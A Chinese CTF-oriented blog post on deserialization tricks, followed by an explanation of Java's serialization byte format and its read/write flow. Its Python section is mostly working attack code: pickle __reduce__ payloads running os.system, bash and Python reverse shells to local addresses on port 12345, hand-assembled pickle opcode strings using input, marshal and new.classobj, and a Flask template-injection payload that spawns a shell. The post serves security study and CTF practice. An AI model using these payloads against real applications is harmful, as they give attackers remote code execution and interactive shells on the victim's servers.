反序列化的一些tricks

最新推荐文章于 2022-12-11 22:25:41 发布
最新推荐文章于 2022-12-11 22:25:41 发布
阅读量509 收藏
点赞数
分类专栏: 漏洞 CTF学习 Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JBlock/article/details/89058948
版权
CTF学习 同时被 3 个专栏收录
15 篇文章 0 订阅
订阅专栏
Web安全
14 篇文章 1 订阅
订阅专栏
漏洞
12 篇文章 0 订阅
订阅专栏
简介:

今天记录一些python和java关于反序列化的一些tricks!以备以后查阅!

文章目录

正文
python反序列化

关于序列化与反序列化则不再赘述,在python中,我们通常采用几种库json、pickle/cPickle,当然还有marshal啊shelve啊之类的,不枚举了。这里重点聊聊pickle/cPickle,这两者我们用起来没有任何区别,我个人没有深究二者实现之类的,只知道cPickle的速度远大于pickle就行了。然后这两兄弟有什么问题呢,简单的说就是在在调用他们的loads方法(反序列化)的时候,会根据输入执行python代码,比如我传入

"\x80\x03cbuiltins\neval\nq\x00X\x0f\x00\x00\x00os.system('ls')q\x01\x85q\x02Rq\x03."

这样的字符串到pickle的loads方法中,就能执行os.system('ls'),那么这样的串是怎么构造出来的呢?

看这里,pickle官方文档中reduce一栏

构造的关键就是__reduce__函数,这个魔术方法的作用根据上面的文档简单总结如下:

  • 如果返回值是一个字符串,那么将会去当前作用域中查找字符串值对应名字的对象,将其序列化之后返回,例如最后return 'a',那么它就会在当前的作用域中寻找名为a的对象然后返回,否则报错。
  • 如果返回值是一个元组,要求是2到5个参数,第一个参数是可调用的对象,第二个是该对象所需的参数元组,剩下三个可选。所以比如最后return (eval,("os.system('ls')",)),那么就是执行eval函数,然后元组内的值作为参数,从而达到执行命令或代码的目的,当然也可以return (os.system,('ls',))

看看下面的栗子

#!/usr/bin/env python
# encoding: utf-8
import os
import pickle
class test(object):
    def __reduce__(self):
        #return (eval,("os.system('ls')",))
        return (os.system,('ls',))

a=test()
c=pickle.dumps(a)
print c
pickle.loads(c)

这是简单的执行命令,至于反弹shell的方法就不用说了,看看waitalone师傅的linux下反弹shell的方法,基本的bash反弹如下

#!/usr/bin/env python
# encoding: utf-8
import os
import pickle
class test(object):
    def __reduce__(self):
        code='bash -c "bash -i >& /dev/tcp/127.0.0.1/12345 0<&1 2>&1"'
        return (os.system,(code,))
a=test()
c=pickle.dumps(a)
print c
pickle.loads(c)

所以很容易能看出来其实python的反序列化漏洞相当可啪。

另外要着重提一下,关于这个__reduce__方法是新式类(内置类)特有的,关于新式类和旧式类参照一篇博客:python深入学习(一):类与元类(metaclass)的理解

因此上面的poc,由print的语法看出来我用的python2,所以test类需要继承自object,python3则不需要。

至于这个反序列化得到的字符串的格式代表的意义此处不做深究,可以参照文章Python Pickle的任意代码执行漏洞实践和Payload构造或是Arbitrary code execution with Python pickles

0x01 基础利用

通常我们利用__reduce__函数进行构造,一个样例如下:

#!/usr/bin/env python
# encoding: utf-8
import os
import pickle
class test(object):
    def __reduce__(self):
        return (os.system,('ls',))

a=test()
payload=pickle.dumps(a)
print payload
pickle.loads(payload)

其中pickle.loads是会解决import 问题,对于未引入的module会自动尝试import。那么也就是说整个python标准库的代码执行、命令执行函数我们都可以使用。 之前把python的标准库都大概过了一遍,把其中绝大多数的可用函数罗列如下:

eval, execfile, compile, open, file, map, input,
os.system, os.popen, os.popen2, os.popen3, os.popen4, os.open, os.pipe,
os.listdir, os.access,
os.execl, os.execle, os.execlp, os.execlpe, os.execv,
os.execve, os.execvp, os.execvpe, os.spawnl, os.spawnle, os.spawnlp, os.spawnlpe,
os.spawnv, os.spawnve, os.spawnvp, os.spawnvpe,
pickle.load, pickle.loads,cPickle.load,cPickle.loads,
subprocess.call,subprocess.check_call,subprocess.check_output,subprocess.Popen,
commands.getstatusoutput,commands.getoutput,commands.getstatus,
glob.glob,
linecache.getline,
shutil.copyfileobj,shutil.copyfile,shutil.copy,shutil.copy2,shutil.move,shutil.make_archive,
dircache.listdir,dircache.opendir,
io.open,
popen2.popen2,popen2.popen3,popen2.popen4,
timeit.timeit,timeit.repeat,
sys.call_tracing,
code.interact,code.compile_command,codeop.compile_command,
pty.spawn,
posixfile.open,posixfile.fileopen,
platform.popen

除开我们常见的那些os库、subprocess库、commands库之外还有很多可以执行命令的函数,这里用举两个不常用的:

map(__import__('os').system,['bash -c "bash -i >& /dev/tcp/127.0.0.1/12345 0<&1 2>&1"',])

sys.call_tracing(__import__('os').system,('bash -c "bash -i >& /dev/tcp/127.0.0.1/12345 0<&1 2>&1"',))

platform.popen("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"127.0.0.1\",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'")
0x02 input函数

相信有童鞋已经敏锐的注意到了这个input函数,这个通常很难进入大家的视线。 这个函数也仅在python2中能够利用,在博客python深入学习(三):从py2到py3 中提到过为什么。 这个函数在python2中是能够执行python代码的。但是有一个问题就是这个函数是从标准输入获取字符串,所以怎么利用就是一个问题,不过相信大家看到我 hook pickle的load的方法就知道这里该怎么利用了,我们可以利用StringIO库,然后将标准输入修改为StringIO创建的内存缓冲区即可。 接下来说说怎么把这个函数用起来。 首先关于pickle 的数据流协议在python2里面有三种,python3里面有五种,默认的是0,具体可以看看勾陈安全实验室的写的Python Pickle的任意代码执行漏洞实践和Payload构造,其中对协议进行说明,这里搬运下:

c:读取新的一行作为模块名module,读取下一行作为对象名object,然后将module.object压入到堆栈中。
(:将一个标记对象插入到堆栈中。为了实现我们的目的,该指令会与t搭配使用,以产生一个元组。
t:从堆栈中弹出对象,直到一个“(”被弹出,并创建一个包含弹出对象(除了“(”)的元组对象,并且这些对象的顺序必须跟它们压入堆栈时的顺序一致。然后,该元组被压入到堆栈中。
S:读取引号中的字符串直到换行符处,然后将它压入堆栈。
R:将一个元组和一个可调用对象弹出堆栈,然后以该元组作为参数调用该可调用的对象,最后将结果压入到堆栈中。
.:结束pickle。

好的我们来构造一下这个input函数

c__builtin__
input
(S'input: '
tR.

然后我们要想办法修改一下标准输入,正常python2里面我们一般这样修改

img

但是在pickle的0号协议中,我们不能用等于符号,但是我们可以用setattr函数

img

好的现在万事就绪了,只需要把这一套用上述协议转换一下就行了。

c__builtin__
setattr
(c__builtin__
__import__
(S'sys'
tRS'stdin'
cStringIO
StringIO
(S'__import__('os').system(\'curl 127.0.0.1:12345\')'
tRtRc__builtin__
input
(S'input: '
tR.

直接反弹shell就行了

a='''c__builtin__\nsetattr\n(c__builtin__\n__import__\n(S'sys'\ntRS'stdin'\ncStringIO\nStringIO\n(S'__import__('os').system('bash -c "bash -i >& /dev/tcp/127.0.0.1/12345 0<&1 2>&1"')'\ntRtRc__builtin__\ninput\n(S'python> '\ntR.'''

pickle.loads(a)
0x03 任意函数构造

在勾陈安全实验室的文章中,提到了一个types.FunctionType配上marshal.loads的方法,

import base64
import marshal

def foo():
    import os
    os.system('bash -c "bash -i >& /dev/tcp/127.0.0.1/12345 0<&1 2>&1"')

payload="""ctypes
FunctionType
(cmarshal
loads
(cbase64
b64decode
(S'%s'
tRtRc__builtin__
globals
(tRS''
tR(tR."""%base64.b64encode(marshal.dumps(foo.func_code))

pickle.loads(payload)

payload="""ctypes
FunctionType
(cmarshal
loads
(S'%s'
tRc__builtin__
globals
(tRS''
tR(tR."""%marshal.dumps(foo.func_code).encode('string-escape')

pickle.loads(payload)

这里不再赘述,同样的思路我们还有一些别的方法,例如和types.FunctionType几乎一样的函数new.function

import base64
import marshal

def foo():
    import os
    os.system('bash -c "bash -i >& /dev/tcp/127.0.0.1/12345 0<&1 2>&1"')

payload="""cnew
function
(cmarshal
loads
(cbase64
b64decode
(S'%s'
tRtRc__builtin__
globals
(tRS''
tR(tR."""%base64.b64encode(marshal.dumps(foo.func_code))

pickle.loads(payload)

payload="""cnew
function
(cmarshal
loads
(S'%s'
tRc__builtin__
globals
(tRS''
tR(tR."""%marshal.dumps(foo.func_code).encode('string-escape')

pickle.loads(payload)
0x04 类函数构造

这里主要使用new.classobj函数来构造一个类函数对象然后执行,这样就可以调用原有库的一些函数,也可以自己构造。

payload=pickle.dumps(new.classobj('system', (), {'__getinitargs__':lambda self,arg=('bash -c "bash -i >& /dev/tcp/127.0.0.1/12345 0<&1 2>&1"',):arg, '__module__': 'os'})())

pickle.loads(payload)

lambda语句也可以换成上述提到的new.function或是types.FunctionType的构造。

既然有了这种思路,那么new库里面的提到的很多东西都可以转换思路了。有兴趣可以去研究一下

0x05 构造SSTI

本来这是一个打算用于以后的一个点的,但是这次有人用这种方法做出来了,那我也就分享一下了。说道要找执行代码的函数,不久前的qwb和hitb我都特意采用了Flask框架。而要知道Flask的render_template_string所引发的SSTI漏洞则又是另一个可利用的点了。

payload="cflask.templating\nrender_template_string\np0\n(S\"{% for x in (().__class__.__base__.__subclasses__()) %}{%if x.__name__ =='catch_warnings'%}{{x.__repr__.im_func.func_globals.linecache.os.system('bash -c \"bash -i >& /dev/tcp/172.17.0.1/12345 0>&1\" &')}}{%endif%}{%endfor%}\"\np1\ntp2\nRp3\n."
0x06 其它注意
  • PyYAML
  • marshal
  • shelve
参考

参考链接:https://xz.aliyun.com/t/2289

参考链接2:https://www.anquanke.com/post/id/86800

参考链接3:http://bendawang.site/2018/03/01/关于Python-sec的一些总结/

java反序列化

序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中;反序列化即逆过程,由字节流还原成对象。Java中的 ObjectOutputStream 类的 writeObject() 方法可以实现序列化,类 ObjectInputStream类的readObject() 方法用于反序列化。

如果要实现类的反序列化,则是对其实现 Serializable 接口

序列数据结构

而该对象经过Java序列化后得到的则是一个二进制串:

ac ed 00 05 73 72 00 11  53 65 72 69 61 6c 69 7a    ....sr.. Serializ
61 74 69 6f 6e 44 65 6d  6f d9 35 3c f7 d6 0a c6    ationDem o.5<....
d5 02 00 02 49 00 08 69  6e 74 46 69 65 6c 64 4c    ....I..i ntFieldL
00 0b 73 74 72 69 6e 67  46 69 65 6c 64 74 00 12    ..string Fieldt..
4c 6a 61 76 61 2f 6c 61  6e 67 2f 53 74 72 69 6e    Ljava/la ng/Strin
67 3b 78 70 00 01 7d f1  74 00 05 67 79 79 79 79    g;xp..}. t..gyyyy

仔细观察二进制串中的部分可读数据,我们也可以差不多分辨出该对象的一些基本内容。但同样为了手写的目的 (为什么有这个目的?原因很简单,为了不被语言环境束缚) ,以及为接下来的序列化执行流程分析做准备,我们先依次来解读一下这个二进制串中的各个元素。

  • 0xaced,魔术头
  • 0x0005,版本号 (JDK主流版本一致,下文如无特殊标注,都以JDK8u为例)
  • 0x73,对象类型标识 (0x7n基本上都定义了类型标识符常量,但也要看出现的位置,毕竟它们都在可见字符的范围,详见java.io.ObjectStreamConstants)
  • 0x72,类描述符标识
  • 0x0011...,类名字符串长度和值 (Java序列化中的UTF8格式标准)
  • 0xd9353cf7d60ac6d5,序列版本唯一标识 (serialVersionUID,简称SUID)
  • 0x02,对象的序列化属性标志位,如是否是Block Data模式、自定义writeObject()SerializableExternalizableEnum类型等
  • 0x0002,类的字段个数
  • 0x49,整数类型签名的第一个字节,同理,之后的0x4c为字符串类型签名的第一个字节 (类型签名表示与JVM规范中的定义相同)
  • 0x0008...,字段名字符串长度和值,非原始数据类型的字段还会在后面加上数据类型标识、完整类型签名长度和值,如之后的0x740012...
  • 0x78 Block Data结束标识
  • 0x70 父类描述符标识,此处为null
  • 0x00017df1 整数字段intField的值 (Java序列化中的整数格式标准) ,非原始数据类型的字段则会按对象的方式处理,如之后的字符串字段stringField被识别为字符串类型,输出字符串类型标识、字符串长度和值

由此可以看出,除了基本格式和一些整数表现形式上的不同之外,Java和PHP的序列化结果还是存在很多相似的地方,比如除了具体值外都会对类型进行描述。

需要注意的是,Java序列化中对字段进行封装时,会按原始和非原始数据类型排序 (有同学可能想问为什么要这么做,这里我只能简单解释原因有两个,一是因为它们两个的表现形式不同,原始数据类型字段可以直接通过偏移量读取固定个数的字节来赋值;二是在封装时会计算原始类型字段的偏移量和总偏移量,以及非原始类型字段的个数,这使得反序列化阶段可以很方便的把原始和非原始数据类型分成两部分来处理) ,且其中又会按字段名排序。

而开头固定的0xaced0005也可以作为Java序列化二进制串 (Base64编码为rO0AB…) 的识别标识。

序列化的执行流程:
  1. ObjectOutputStream实例初始化时,将魔术头和版本号写入bout (BlockDataOutputStream类型)
  2. 调用ObjectOutputStream.writeObject()开始写对象数据
    • 写入对象类型标识
    • writeClassDesc()进入分支writeNonProxyDesc()写入类描述数据
    • writeSerialData()写入对象的序列化数据
    • 写入类描述符标识
    • 写入类名
    • 写入SUID (当SUID为空时,会进行计算并赋值,细节见下面关于SerialVersionUID章节)
    • 计算并写入序列化属性标志位
    • 写入字段信息数据
    • 写入Block Data结束标识
    • 写入父类描述数据
    • 若类自定义了writeObject(),则调用该方法写对象,否则调用defaultWriteFields()写入对象的字段数据 (若是非原始类型,则递归处理子对象)
    • ObjectStreamClass.lookup()封装待序列化的类描述 (返回ObjectStreamClass类型) ,获取包括类名、自定义serialVersionUID、可序列化字段 (返回ObjectStreamField类型) 和构造方法,以及writeObjectreadObject方法等
    • writeOrdinaryObject()写入对象数据
反序列化流程

继续用简单的示例来看看反序列化:

public static void main(String[] args) throws ClassNotFoundException {
    byte[] data; // read from file or request
    ByteArrayInputStream bin = new ByteArrayInputStream(data);
    ObjectInputStream in = new ObjectInputStream(bin);
    SerializationDemo demo = (SerializationDemo) in.readObject();
}

它的执行流程如下:

  1. ObjectInputStream实例初始化时,读取魔术头和版本号进行校验
  2. 调用ObjectInputStream.readObject()开始读对象数据
    • readClassDesc()读取类描述数据
    • ObjectStreamClass.newInstance()获取并调用离对象最近的非Serializable的父类的无参构造方法 (若不存在,则返回null) 创建对象实例
    • readSerialData()读取对象的序列化数据
    • 读取类描述符标识,进入分支readNonProxyDesc()
    • 读取类名
    • 读取SUID
    • 读取并分解序列化属性标志位
    • 读取字段信息数据
    • resolveClass()根据类名获取待反序列化的类的Class对象,如果获取失败,则抛出ClassNotFoundException
    • skipCustomData()循环读取字节直到Block Data结束标识为止
    • 读取父类描述数据
    • initNonProxy()中判断对象与本地对象的SUID和类名 (不含包名) 是否相同,若不同,则抛出InvalidClassException
    • 若类自定义了readObject(),则调用该方法读对象,否则调用defaultReadFields()读取并填充对象的字段数据
    • 读取对象类型标识
    • readOrdinaryObject()读取数据对象
参考链接
JBlock
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SnakeYaml 反序列化的一个小 trick
Sumarua的博客
03-28 964
背景 这是我在做某个代码审计项目时遇到的场景,一个 yaml 解析的功能使用了 snakeyaml 来处理 yaml,snakeyaml 一般情况下是可以直接进行反序列化攻击的。但这里它做了一个前提条件 —— “不允许 yaml 中存在 !!”。 打过 yaml 反序列化漏洞的人应该都知道 !! 就相当于 fastjson 里的 @type,用于指定要反序列化的全类名。 一旦 yaml 缺少了 !! 将无法再指定恶意的反序列化类,也就构不成代码执行的威胁了。 分析 !!javax.script.Scrip
万能序列,反序列化
Mark
03-22 869
序列化: public static string XmlSerializer(T serialObject) where T : class        {            XmlSerializer xmlSerializer = new XmlSerializer(typeof(T));            System.IO.MemoryStream memmor
[CTF]PHP反序列化总结
m0_55754984的博客
08-14 745
简介 序列化其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。 在网上找到一个比较形象的例子 比如:现在我们都会在淘宝上买桌子,桌子这种很不规则的东西,该怎么从一个城市运输到另一个城市,这时候一般都会把它拆掉成板子,再装到箱子里面,就可以快递寄出去了,这个过程就类似我们的序列化的过程(把数据转化为可以存储或者传输的形式)。当买家收到货后,就需要自己把这些板子组装成桌子的样子,这个过程就像反序列的过程(转化成当初的数据对象)。 php 将数据序列化和反序列化会用到两个函数 ser
CTF_Web:反序列化学习笔记(二)CTF经典考题由浅至深
AFCC_的博客(Web_Dog)
08-16 5952
0x00 CTF中的反序列化题目 这类题目中主要是利用反序列化各种魔术方法的绕过或调用,从而构造符合条件的序列化字符串,完成特定的功能,在这一点上对于整个代码段的执行流程要很清楚。我们先从最简单的开始看起。 0x01 攻防世界unserialize3 题目显示的源码为: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 在这里我们可以看到只有一个魔术方法,而__w
CTF中的PHP反序列化ALL IN ONE
热门推荐
Love&Share
09-01 1万+
CTF中的PHP反序列化 1.反序列化的基础知识 什么是序列化,反序列化,php反序列化,序列化字符串知识,漏洞产生原因,修复方法 php反序列化漏洞,又叫php对象注入漏洞,是ctf中常见的漏洞。 PHP基础知识 PHP类与对象(https://www.php.net/manual/zh/language.oop5.php) PHP魔术方法(https://secure.php.net/manual/zh/language.oop5.magic.php) 序列化定义 php程序为了保存和转储对象,提供了序
利用Python实现Json序列化库的方法步骤
09-16
Python标准库提供了`json`模块,用于处理JSON数据的序列化和反序列化。然而,当涉及到Python自定义类的对象时,`json`库默认并不支持直接序列化。本文将探讨如何通过自定义方法或利用第三方库解决这个问题。 首先,...
JAVA-TricksoftheJavaProgrammingGurus.zip_java programming_tricks
09-24
9. **枚举单例模式**: 枚举单例模式是创建单例的最佳实践之一,既保证了线程安全,又防止了反序列化时产生额外实例的问题。 10. **设计模式**: 学习并应用设计模式(如工厂模式、观察者模式、装饰器模式等)可以...
css-tricks:一些技巧主要基于CSS3
06-13
标题“css-tricks:一些技巧主要基于CSS3”暗示我们将讨论一些利用CSS3新特性的技术。CSS3的引入极大地扩展了CSS的能力,引入了模块化、选择器增强、多列布局、过渡、动画、变换、阴影以及更好的边框和背景等特性。 ...
50个统一提示:从编辑器工具到序列化再到UI快捷方式的有关Unity(专注于Mobile)的50个提示的集合
02-04
4. **序列化**:Unity支持对公共字段和属性的自动序列化,但也可以通过`[SerializeField]`或`[HideInInspector]`自定义序列化行为。 5. **预制体(Prefabs)**:预制体是Unity的重要概念,用于管理对象实例。它们可以...
pyjson_tricks:Python JSON的额外功能:注释,顺序,numpy,熊猫,日期时间等等! 简单但可自定义
02-03
`pyjson_tricks`通过使用`OrderedDict`或者Python 3.7以上版本的内置有序字典,确保序列化和反序列化过程中对象的顺序得到保留。 3. **处理Numpy数据**: 对于科学计算领域,Numpy数组是常用的数据结构。`pyjson_...
CTF技巧集合 tricks
10-23
Phithon——CTF比赛总是输?你还差点Tricks!非常有用的资源
Javaweb安全——Weblogic反序列化漏洞(一)
weixin_43610673的博客
12-11 2888
从原生反序列化过程开始谈起。
java stream read_Java ObjectInputStream read()用法及代码示例
weixin_39915700的博客
03-04 203
Java中的ObjectInputStream类的read()方法读取一个字节的数据。如果没有数据,该方法将不会运行。用法:public int read()参数:此方法不接受任何参数。返回值:此方法返回读取的字节,如果到达流的末尾,则返回-1。异常注意:如果发生I /O错误,该函数将引发IOException。以下示例程序旨在说明上述方法:示例1:// Java program to illus...
java object取数据_java使用ObjectInputStream从文件中读取对象
weixin_35395422的博客
02-25 1768
import java.io.EOFException;import java.io.FileInputStream;import java.io.FileNotFoundException;import java.io.IOException;import java.io.ObjectInputStream;public class Main {/***ObjectInputStream 使用示...
关于命令执行与反序列化
Jeromeyoung
01-30 1512
命令与代码执行 实际就是对要求输入的值没有严格控制,导致恶意命令执行了。 简介:自己读吧,官方的东西。 1、远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 而如果设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“意想不到”的命
GIT-SHELL 沙盒绕过(CVE-2017-8386)
黑白的博客
12-23 1038
声明 好好学习,天天向上 漏洞描述 GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。 影响范围 复现过程 使用vulhub /app/vulhub-master/git/CVE-2017-8386 使用docker启动 docker-compose build docker-compose up -d 先准备好id_rsa,这是ssh的私钥,作者已经帮我们准备好了,就在docker-compose文件一起的文件夹内,拷贝到kali中,执行下述命令 ch
SSRF
kuiguowei的博客
01-16 1351
SSRF如何产生的? SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统。SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与
PHP反序列化漏洞总结
坚持硬核
10-07 1万+
一、什么是序列化? 将php中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中。而反序列化就是将这个过程倒过来。 当在php中创建了一个对象后,可以通过serialize()把这个对象变成一个字符串,保存对象的值方便以后传递使用。 <?php class A{ public $test = 123; } $a = new A; $a_ser=ser...
Curl 导致 SSRF 及 WAF 绕过方式
Fly_鹏程万里
10-14 3318
Curl 漏洞 背景 SSRF 一般用来探测内网服务,但由于应用层使用的 Request 服务(curl/filegetcontents)一般不只是支持 HTTP/HTTPS,导致可以深层次利用。 漏洞代码 function curl($url){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); ...
Matlab Tricks(十九)—— 序列左右移的实现
最新发布
05-14
在 Matlab 中,对于序列的左右移可以使用 `circshift` 函数来实现。 `circshift` 函数的使用格式为: ```matlab B = circshift(A,k) ``` 其中,`A` 表示原始序列,`k` 表示移动的位数,正数表示右移,负数表示...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值